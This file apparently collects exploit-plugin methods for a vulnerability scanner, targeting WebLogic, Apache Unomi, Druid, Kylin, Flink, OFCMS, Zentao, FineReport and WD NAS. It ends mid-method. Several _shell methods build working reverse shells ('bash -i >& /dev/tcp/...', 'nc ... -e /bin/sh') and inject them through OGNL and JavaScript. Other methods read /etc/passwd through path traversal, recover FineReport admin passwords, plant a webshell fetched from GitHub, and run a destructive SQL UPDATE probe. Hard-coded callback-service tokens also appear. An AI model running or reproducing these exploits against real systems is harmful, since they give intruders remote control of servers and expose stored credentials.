def _verify(self):
    """Out-of-band check against the ``/wls-wsat/CoordinatorPortType`` endpoint.

    Posts the XML built by ``self.get_check_payload`` (pointing the target at a
    ceye.io callback host) and then polls the ceye.io records API for a request
    whose URL contains ``random_uri``. On a hit, ``result['VerifyInfo']`` holds
    the endpoint URL and the payload; the dict is handed to ``self.parse_output``.
    """
    result = {}
    veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
    random_uri = random_str(16)
    # Callback host/port the target is expected to contact.
    check_host = 'zum76x.ceye.io'
    check_port = 80
    payload = self.get_check_payload(check_host, check_port, random_uri)
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    }
    try:
        # NOTE(review): neither request has a timeout; a stalled target blocks the caller.
        requests.post(veri_url, data=payload, headers=headers)
        # NOTE(review): the ceye API token is a hard-coded credential committed in source
        # and is sent over plain http; it belongs in configuration, not in the module.
        resp = requests.get(
            'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
        )
        # Accept both the bare host and the host:port form of the recorded URL.
        pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port, random_uri)
        if re.search(pattern, resp.text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        # Any network, DNS or parsing failure is logged and reported as "not verified".
        logger.warn(str(e))
    return self.parse_output(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/druid/indexer/v1/sampler?for=filter' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = yourlistenIP PORT = yourlistenPORT payload = 'nc ' + IP + ' ' + PORT + ' -e /bin/sh' pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _verify(self):
    """Out-of-band check of the Kylin ``/kylin/api/diag/project/.../download`` endpoint.

    Logs in via ``self.login``, obtains a CEye subdomain, and requests the diag
    download path with ``||curl <random>.<subdomain>||`` (``%7c`` is ``|``,
    ``%20`` is a space) spliced into the project segment. The check succeeds
    when ``CEye_main.verify_request`` reports a callback for ``random_uri``.
    """
    result = {}
    cookies = self.login()
    CEye_main = CEye(token=self.token)
    ceye_subdomain = CEye_main.getsubdomain()
    random_uri = random_str(16)
    logger.info("random_url为:%s" % random_uri)
    verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
    veri_url = urljoin(
        self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload + '%7c%7c/download')
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Cookie": cookies
    }
    # NOTE(review): this writes the live session cookie to the log at info level.
    logger.info("Headres如下:")
    logger.info(headers)
    try:
        # NOTE(review): no timeout; `resp` is unused — verification relies solely on the OOB callback.
        resp = requests.get(veri_url, headers=headers)
        if CEye_main.verify_request(random_uri):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} ' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _attack(self):
    """Fetch an arbitrary file through the ``xyhai.php`` ``Database/downFile`` traversal.

    The ``filename`` option (default ``App\\Common\\Conf\\db.php``) is appended
    after a ``..\\..\\..\\`` prefix; forward slashes in the option are rewritten
    to backslashes. A 200 response that does not contain ``Flag_error`` is
    reported with the full body in ``result['VerifyInfo']['File_Content']``.
    """
    result = {}
    try:
        # NOTE(review): this marker is the Flink JobManager message, not anything this
        # endpoint emits (the sibling _verify uses "该文件不存在"); as written the
        # `Flag_error not in ...` filter never excludes an error page here — confirm.
        Flag_error = "This file does not exist in JobManager log dir"
        if self.get_option("filename"):
            # '\\\\' is a single escaped backslash pair at runtime: '/' becomes '\\'.
            attack_filename = self.get_option("filename").replace(
                '/', '\\\\')
        else:
            attack_filename = 'App\\Common\\Conf\\db.php'
        logger.info("下载文件为:" + attack_filename)
        attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
        attack_url = self.url + attack_payload
        logger.info(attack_url)
        cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
        # NOTE(review): TLS verification disabled, no timeout.
        attack_res = requests.get(attack_url, cookies=cookies, verify=False)
        # .decode() assumes UTF-8; a binary download would raise and be swallowed below.
        if attack_res.status_code == 200 and Flag_error not in attack_res.content.decode():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = attack_url
            result['VerifyInfo']['Payload'] = attack_payload
            result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
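def login(self):
    """Authenticate against the OFCMS admin login endpoint and return a session cookie.

    Posts the ``username``/``password`` options as JSON to
    ``/ofcms-admin/admin/dologin.json``. When the response is HTTP 200 and its
    JSON ``code`` is ``'200'``, the ``JSESSIONID`` cookie is returned as a
    ``"JSESSIONID=<value>"`` header value.

    Returns:
        The cookie header string, or ``None`` when login did not succeed
        (non-200 status, unexpected body, missing JSESSIONID, or any request
        error — each is only logged). Previously the name was left unbound on
        failure and the final ``return`` raised ``UnboundLocalError``.
    """
    cookie = None
    login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
    post_data = {
        "username": self.get_option("username"),
        "password": self.get_option("password")
    }
    headers = {
        "Content-Type": "application/json; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }
    try:
        # NOTE(review): `headers` is built but never passed, so the JSON body goes out
        # without its Content-Type; also no timeout. Left as-is to preserve behaviour.
        resp = requests.post(login_url, data=json.dumps(post_data))
        if resp.status_code == 200 and json.loads(
                resp.text)['code'] == '200':
            cookies = requests.utils.dict_from_cookiejar(resp.cookies)
            cookie = "JSESSIONID=" + cookies["JSESSIONID"]
            # NOTE(review): this writes a live session cookie to the log.
            logger.info("获得的Cookie为:%s" % cookie)
            logger.info("Ofcms系统登录成功")
        else:
            logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
    except Exception as e:
        # KeyError (no JSESSIONID), JSON decode errors and network errors all land here.
        logger.warn(e)
        logger.warn("Ofcms系统登录失败")
    return cookie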
def _verify(self):
    """Error-based SQL check against ``/ofcms-admin/admin/system/generate/create.json``.

    After ``self.login``, posts an ``sql`` form field containing an ``UPDATE``
    on ``of_cms_link`` whose ``updatexml`` call embeds ``random_uri``; the
    check passes when ``~<random_uri>~`` is echoed in the response text.
    """
    result = {}
    cookies = self.login()
    random_uri = random_str(16)
    logger.info("random_uri为:%s" % random_uri)
    # NOTE(review): the probe is a write statement (UPDATE ... WHERE link_id=4), not a
    # read-only SELECT; if the updatexml error does not fire, the row is modified.
    verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
    post_data = {"sql": verify_payload}
    veri_url = urljoin(
        self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Cookie": cookies
    }
    # NOTE(review): this writes the live session cookie to the log at info level.
    logger.info("Headres如下:")
    logger.info(headers)
    try:
        # NOTE(review): no timeout.
        resp = requests.post(veri_url, data=post_data, headers=headers)
        # 0x7e is '~'; the marker is wrapped so a bare random string elsewhere does not match.
        flag = "~" + random_uri + "~"
        if flag in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """DNS out-of-band check against ``/_async/AsyncResponseService``.

    Posts the XML from ``self.get_check_payload(cmd)``, where ``cmd`` is a
    random label under a ceye.io domain, then polls the ceye.io DNS records
    API for that label.
    """
    result = {}
    veri_url = urljoin(self.url, '/_async/AsyncResponseService')
    # Unique DNS label so a hit can be attributed to this run.
    cmd = random_str(16) + '.6eb4yw.ceye.io'
    payload = self.get_check_payload(cmd)
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        'Accept-Encoding': "gzip, deflate",
        'Cookie': "sidebar_collapsed=false",
        'Connection': "close",
        'Upgrade-Insecure-Requests': "1",
        'Content-Type': "text/xml",
        # NOTE(review): hard-coded Content-Length does not match `payload`.
        'Content-Length': "1001",
        'cache-control': "no-cache"
    }
    try:
        # NOTE(review): no timeouts on either request.
        requests.post(veri_url, data=payload, headers=headers)
        # NOTE(review): hard-coded ceye API token in source, queried over plain http;
        # move it to configuration.
        res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
        if cmd in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Read ``privilege.xml`` through ``/ReportServer?op=chart&cmd=get_geo_json`` and recover the admin credentials.

    Extracts ``<rootManagerName>`` and ``<rootManagerPassword>`` from the
    response, then de-obfuscates the password: after dropping a 3-character
    prefix, each 4-hex-digit group is XORed with ``PASSWORD_MASK_ARRY`` (cycled
    by index) and mapped through ``chr``. Username and recovered password are
    placed in ``result['AdminInfo']``.
    """
    result = {}
    veri_url = self.url + '/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml'
    try:
        # NOTE(review): no timeout.
        resp = requests.get(veri_url)
        pattern1 = r"<rootManagerPassword>.*</rootManagerPassword>"
        patrern2 = r"<rootManagerName>.*</rootManagerName>"  # (sic) local name typo
        # str(bytes) yields the repr ("b'...'"), so a newline in the body appears as
        # the two characters \n; the slice offsets below presumably account for the
        # tags plus whatever wrapper sits inside them — confirm against a real response.
        r2 = re.search(patrern2, str(resp.content))
        r1 = re.search(pattern1, str(resp.content))
        # AttributeError on a non-match is swallowed by the except below.
        username = r2.group(0)[28:-21]
        cipher = r1.group(0)[32:-25]
        PASSWORD_MASK_ARRY = [19, 78, 10, 15, 100, 213, 43, 23]
        password = ""
        cipher = cipher[3:]  # presumably a fixed marker prefix — TODO confirm
        for i in range(int(len(cipher) / 4)):
            p1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
            p2 = p1 ^ PASSWORD_MASK_ARRY[i % 8]
            password = password + chr(p2)
        # NOTE(review): the recovered credential is written into the result output.
        if resp.status_code == 200 and password:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['AdminInfo'] = {}
            result['AdminInfo']["UserName"] = username
            result['AdminInfo']["Password"] = password
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _shell(self):
    """Send the configured ``command`` option to ``/web/dsdk/DsdkProxy.php``.

    A GET to ``network_mgr.cgi`` precedes the POST. The command is spliced into
    a ``';<cmd>;'`` body and sent with a forged ``isAdmin=1;username=admin``
    cookie. Nothing is returned and no response is inspected, unlike the
    ``_verify`` method for the same endpoint.
    """
    veri_url1 = urljoin(
        self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = self.get_option("command")
    # The option is inserted verbatim; a value containing a quote breaks the wrapper.
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    try:
        # NOTE(review): no timeouts; the POST response is discarded.
        requests.get(veri_url1)
        requests.post(veri_url2, data=data, headers=headers)
    except Exception as e:
        logger.warn(str(e))
def _shell(self):
    """Post a shell payload to ``/wls-wsat/CoordinatorPortType``.

    Builds ``bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1`` and wraps
    it with ``self.get_shell_payload('/bin/bash', '-c', cmd)``. The response is
    discarded and nothing is returned.
    """
    vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
    cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(
        get_listener_ip(), get_listener_port())
    shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    }
    try:
        # NOTE(review): no timeout.
        requests.post(vul_url, data=shell_payload, headers=headers)
    except Exception as e:
        logger.warn(str(e))
def _verify(self):
    """Double-URL-encoded traversal check on ``/jobmanager/logs/``.

    Requests ``..%252f`` x12 followed by ``etc%252fhosts`` (``%252f`` decodes
    twice to ``/``). A 200 whose body lacks ``Flag_error`` is reported with the
    body in ``result['VerifyInfo']['File_Content']``.
    """
    result = {}
    try:
        Flag_error = "This file does not exist in JobManager log dir"
        verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts'
        verify_url = self.url + verify_payload
        logger.info(verify_url)
        # NOTE(review): TLS verification disabled, no timeout.
        verify_res = requests.get(verify_url,verify=False)
        # .decode() assumes UTF-8; a decode error is swallowed by the except below.
        if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            result['VerifyInfo']['Payload'] = verify_payload
            result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Check ``/web/dsdk/DsdkProxy.php`` by running ``cat /proc/cpuinfo`` and looking for cpuinfo field names.

    A GET to ``network_mgr.cgi`` precedes the POST; the POST carries a forged
    ``isAdmin=1;username=admin`` cookie. A response containing any of
    ``Processor``, ``BogoMIPS``, ``Hardware`` or ``Revision`` is treated as
    command output. Returns ``self.parse_verify(result)``.
    """
    result = {}
    veri_url1 = urljoin(
        self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = 'cat /proc/cpuinfo'
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    try:
        # NOTE(review): no timeouts.
        requests.get(veri_url1)
        resp = requests.post(veri_url2, data=data, headers=headers)
        # These words are generic; a page that merely mentions them would also match.
        if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
    except Exception as e:
        logger.warn(str(e))
    return self.parse_verify(result)
def _verify(self):
    """Template-injection check on ``/search.php``.

    The ``order`` field closes the template tag and injects ``phpinfo()``; the
    check passes when ``allow_url_include`` (a phpinfo() table entry) appears
    in the response.
    """
    result = {}
    phpcode = "phpinfo()"
    flagText = "allow_url_include"
    verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)" + phpcode + ";if(1}{end if}"
    veri_url = urljoin(self.url, '/search.php')
    headers = {
        "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    }
    try:
        # NOTE(review): no timeout. The body is sent as a raw string, so it is not form-encoded by requests.
        resp = requests.post(veri_url,data=verify_payload,headers=headers)
        if flagText in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _shell(self):
    """Make the target fetch a remote PHP file via ``index.php?m=client&f=download`` and request it back.

    ``link`` is the base64 of a raw.githubusercontent.com URL; the file is
    expected under ``/data/client/<random_uri>/php_shell.php``. ``result`` is
    never populated, so ``self.parse_output`` always receives an empty dict.
    """
    result = {}
    random_uri = random_str(16)
    try:
        # NOTE(review): the fetched content is hosted in a third-party GitHub repository
        # the operator does not control; whatever that URL serves at run time is what
        # lands on the target.
        shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
        base64_payload = base64.b64encode(shell_payload.encode())
        shell_content = base64_payload.decode()
        shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
        print(shell_url)  # NOTE(review): stdout print; the rest of the module uses logger
        cookies = {
            "zentaosid": self.get_option("zentaosid")
        }
        # NOTE(review): no timeouts; both responses are ignored.
        down_res = requests.get(shell_url,cookies=cookies)
        shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
        logger.info("webshell地址:" + shell_info_url)
        shell_res = requests.get(shell_info_url,cookies=cookies)
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Traversal check through ``xyhai.php`` ``Database/downFile`` that reads ``xyhai.php`` itself.

    A 200 response not containing ``Flag_error`` (the app's "file does not
    exist" text) is reported with the body in ``File_Content``.
    """
    result = {}
    try:
        Flag_error = "该文件不存在"
        verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip'
        verify_url = self.url + verify_payload
        logger.info(verify_url)
        cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
        # NOTE(review): TLS verification disabled, no timeout.
        verify_res = requests.get(verify_url, cookies=cookies, verify=False)
        # .decode() assumes UTF-8; a decode error is swallowed by the except below.
        if verify_res.status_code == 200 and Flag_error not in verify_res.content.decode():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            result['VerifyInfo']['Payload'] = verify_payload
            result['VerifyInfo']['File_Content'] = '\n' + verify_res.content.decode()
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _attack(self):
    """Read a chosen file through the ``/jobmanager/logs/`` traversal.

    Uses the ``filename`` option (default ``/etc/passwd``) after passing it
    through ``quote`` twice. A 200 whose body lacks ``Flag_error`` is reported
    with the body in ``File_Content``.
    """
    result = {}
    try:
        Flag_error = "This file does not exist in JobManager log dir"
        # NOTE(review): quote()'s second positional parameter is `safe`, not an encoding;
        # passing 'utf-8' marks those characters as safe and leaves '/' unescaped (the
        # default). The double call is therefore not the %252f scheme the prefix uses — confirm.
        if self.get_option("filename"):
            attack_filename = quote(quote(self.get_option("filename"),'utf-8'))
        else:
            attack_filename = quote(quote("/etc/passwd",'utf-8'))
        logger.info("下载文件为:" + attack_filename)
        attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename
        attack_url = self.url + attack_payload
        logger.info(attack_url)
        # NOTE(review): TLS verification disabled, no timeout.
        attack_res = requests.get(attack_url,verify=False)
        if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = attack_url
            result['VerifyInfo']['Payload'] = attack_payload
            result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """XML external-entity out-of-band check posted to ``self.url``.

    The DOCTYPE declares a parameter entity pointing at ``http://<ceye
    subdomain>/<random_uri>``; ``CEye_main.verify_request`` decides whether the
    target resolved it. ``%%`` in the template is a literal ``%`` after
    %-formatting.
    """
    result = {}
    CEye_main = CEye(token=self.token)
    ceye_subdomain = CEye_main.getsubdomain()
    random_uri = random_str(16)
    logger.info("random_url为:%s" % random_uri)
    verify_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% xxe SYSTEM "http://%s/%s"> %%xxe; ]>""" % (ceye_subdomain,random_uri)
    # NOTE(review): these are informational, not warnings; consider logger.info.
    logger.warn(verify_payload)
    veri_url = self.url
    logger.warn(veri_url)
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "SOAPAction": "aaa"
    }
    try:
        # NOTE(review): no timeout; `resp` is unused — the decision rests on the OOB callback.
        resp = requests.post(veri_url,data=verify_payload,headers=headers)
        if CEye_main.verify_request(random_uri):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _attack(self):
    """Make the target fetch a remote PHP file via ``index.php?m=client&f=download`` and confirm it executes.

    ``link`` is the base64 of a raw.githubusercontent.com URL; the fetched file
    is then requested from ``/data/client/<random_uri>/php_attack.php`` and a
    fixed marker string in its output is treated as success.
    """
    result = {}
    random_uri = random_str(16)
    try:
        # NOTE(review): the fetched content lives in a third-party GitHub repository the
        # operator does not control; whatever it serves at run time lands on the target.
        attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
        base64_payload = base64.b64encode(attack_payload.encode())
        attack_content = base64_payload.decode()
        attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
        logger.info(attack_url)
        cookies = {
            "zentaosid": self.get_option("zentaosid")
        }
        # NOTE(review): no timeouts; `down_res` is never checked.
        down_res = requests.get(attack_url,cookies=cookies)
        attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
        attack_res = requests.get(attack_info_url,cookies=cookies)
        # The marker is whatever the remote script prints; it is not derived from this run.
        if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = attack_info_url
            result['VerifyInfo']['Payload'] = attack_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
def _verify(self):
    """Check ``index.php?m=client&f=download`` by having the target fetch a remote text file.

    ``link`` is the base64 of a raw.githubusercontent.com URL; the file is then
    requested back from ``/data/client/<random_uri>/php_verify.txt`` and the
    check passes when its expected content (``md5('3.1416');``) is present.
    """
    result = {}
    random_uri = random_str(16)
    try:
        # NOTE(review): the fetched content lives in a third-party GitHub repository the
        # operator does not control; the check depends on that file's current contents.
        verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
        base64_payload = base64.b64encode(verify_payload.encode())
        verify_content = base64_payload.decode()
        verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
        logger.info(verify_url)
        cookies = {
            "zentaosid": self.get_option("zentaosid")
        }
        # NOTE(review): no timeouts; `down_res` is never checked.
        down_res = requests.get(verify_url,cookies=cookies)
        verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
        verify_res = requests.get(verify_info_url,cookies=cookies)
        if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_info_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        logger.warn(str(e))
    return self.parse_output(result)
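def login(self):
    """Authenticate against ``/kylin/api/user/authentication`` with HTTP Basic credentials.

    The ``username``/``password`` options are base64-encoded into an
    ``Authorization: Basic`` header and posted with an empty form body. On HTTP
    200 the ``JSESSIONID`` cookie is returned as a ``"JSESSIONID=<value>"``
    header value.

    Returns:
        The cookie header string, or ``None`` when login did not succeed
        (401, any other non-200 status, missing JSESSIONID, or a request
        error — each is only logged). Previously the name was left unbound on
        failure and the final ``return`` raised ``UnboundLocalError``; a 401
        was also logged twice (the 401 branch and the generic else branch).
    """
    cookie = None
    login_url = urljoin(self.url, '/kylin/api/user/authentication')
    login_data = b64encode((self.get_option("username") + ":" + self.get_option("password")).encode("utf-8"))
    headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')}
    post_data = {}
    try:
        # NOTE(review): no timeout.
        resp = requests.post(login_url, data=post_data, headers=headers)
        if resp.status_code == 401:
            logger.info("账号或密码错误")
        elif resp.status_code == 200:
            cookies = requests.utils.dict_from_cookiejar(resp.cookies)
            cookie = "JSESSIONID=" + cookies["JSESSIONID"]
            # NOTE(review): this writes a live session cookie to the log.
            logger.info("获得的Cookie为:%s" % cookie)
            logger.info("Apache_Kylin登录成功")
        else:
            logger.info("Apache_Kylin登录失败,响应状态码为 %s " % str(resp.status_code))
    except Exception as e:
        # KeyError (no JSESSIONID) and network errors both land here.
        logger.warn(str(e))
        logger.warn("Apache_Kylin登录失败")
    return cookie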
def _verify(self):
    """DNS out-of-band check of ``/context.json`` using dnslog.cn.

    Obtains a throwaway dnslog.cn domain, posts a ``personalizations`` request
    whose ``propertyName`` is an OGNL expression that runs
    ``ping catchyou.<domain>``, sleeps 5 s, then polls dnslog.cn for a record
    containing ``catchyou``. Returns ``self.parse_attack(result)``.
    """
    result = {}
    # NOTE(review): both dnslog.cn calls are plain http with verify=False; the target's
    # identity is effectively disclosed to a third-party service.
    getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
    getres_url = 'http://www.dnslog.cn/getrecords.php'
    dnsheaders = {
